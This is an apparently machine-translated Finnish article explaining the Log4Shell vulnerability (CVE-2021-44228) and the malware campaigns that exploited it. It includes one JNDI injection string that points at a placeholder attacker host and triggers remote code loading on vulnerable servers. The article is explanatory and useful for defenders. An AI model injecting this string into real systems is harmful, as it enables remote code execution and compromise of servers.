Log4Shell-haavoittuvuus

10. joulukuuta 2021 julkaistiin Apache Log4j Java-pohjaisen lokialustan kriittisen haavoittuvuuden hyväksikäyttö.julkisesti. CVE-2021-44228 tai Log4Shell jäljitetty haavoittuvuus vaikuttaa Log4j-versioihin Log4j 2.0-beta9:stä 2.14.1:een asti. Uhkatoimijat voivat hyödyntää hyväksikäyttöä luodakseen todentamattoman etäkäytön, suorittaakseen koodia, toimittaakseen haittaohjelmauhkia tai kerätäkseen tietoja. Haavoittuvuus on määritetty kriittiseksi tilaksi, koska Log4j on laajalti käytössä yrityssovelluksissa ja pilvipalveluissa.

Log4Shell tekniset tiedot

Hyödyntäminen alkaa uhkatekijän vaihtamalla verkkoselaimen käyttäjäagenttia. Sitten he vierailevat sivustolla tai etsivät tiettyä merkkijonoa verkkosivustoilta, joiden muoto on:

${jndi:ldap://[hyökkääjä_URL]}

Tämän seurauksena merkkijono lisätään Web-palvelimen käyttölokeihin. Hyökkääjät odottavat sitten, että Log4j-sovellus jäsentää nämä lokit ja saavuttaa liitetyn merkkijonon. Tässä tapauksessa virhe laukeaa, jolloin palvelin soittaa takaisin JNDI-merkkijonossa olevaan URL-osoitteeseen. Tätä URL-osoitetta käytetään väärin käsittelemään Base64-koodattuja komentoja tai Java-luokkiamyöhemmin ja suorita ne vaarantuneella laitteella.

Apache julkaisi nopeasti uuden version - Log4j 2.15.0, korjatakseen hyväksikäytön, mutta huomattava määrä haavoittuvia järjestelmiä saattaa jäädä korjaamatta pitkän ajan. Samaan aikaan uhkatoimijat huomasivat nopeasti Log4Shellin nollapäivän haavoittuvuuden ja alkoivat etsiä sopivia palvelimia hyödynnettäväksi. Infosec-yhteisö on seurannut lukuisia hyökkäyskampanjoita, joissa on käytetty Log4Shellia tarjoamaan laajan valikoiman haittaohjelmauhkia.

Log4Shellia käytetään Cryptominer-, Botnet-, Backdoor- ja tiedonkeruuhyökkäyksissä

Yksi ensimmäisistä uhkatoimijoista, jotka ottivat käyttöön Log4Shellin toiminnassaan, olivat Kinsingin krypto-louhintabottiverkon takana olevat kyberrikolliset. Hakkerit käyttivät Log4Shellia Base64-koodattujen hyötykuormien toimittamiseen ja komentosarjojen suorittamiseen. Näiden komentosarjojen tehtävänä on puhdistaa kohdejärjestelmä kilpailevista krypto-louhintauhista ennen kuin heidän oma Kinsing-haittaohjelmansa suoritetaan.

NetLab 360 löydettyjen uhkien toimijat käyttävät haavoittuvuutta asentaa versiot Mirai ja Muhstik bottiverkkoja on rikkonut laitteita. Nämä haittaohjelmauhat on suunniteltu lisäämään tartunnan saaneita järjestelmiä IoT-laitteiden ja -palvelimien verkkoon, joita hyökkääjät voivat sitten ohjata käynnistämään DDoS-hyökkäyksiä (Distributed Denial-of-Service) tai ottamaan käyttöön krypto-kaivostyöntekijöitä.myöhemmin.

Microsoft Threat Intelligence Centerin mukaan Log4j:n hyväksikäyttö joutui myös Cobalt Strike -majakoita pudottavien hyökkäyskampanjoiden kohteena. Cobalt Strike on laillinen ohjelmistotyökalu, jota käytetään läpäisevyyden testaamiseen yrityksen turvajärjestelmiä vastaan.Sen takaoven ominaisuudet ovat kuitenkin tehneet siitä yleisen osan useiden uhkatoimijaryhmien arsenaalissa. Myöhemmin laitonta takaoven pääsyä uhrin verkkoon käytetään seuraavan vaiheen hyötykuormien, kuten kiristysohjelmien, tietovarastajien ja muiden haittaohjelmauhkien, toimittamiseen.

Log4Shellia voidaan hyödyntää palvelintietoja sisältävien ympäristömuuttujien hankkimiseen. Tällä tavalla hyökkääjät voivat saada pääsyn isäntänimeen, käyttöjärjestelmän nimeen, käyttöjärjestelmän versionumeroon, käyttäjänimeen, jolla Log4j-palvelu toimii, ja paljon muuta.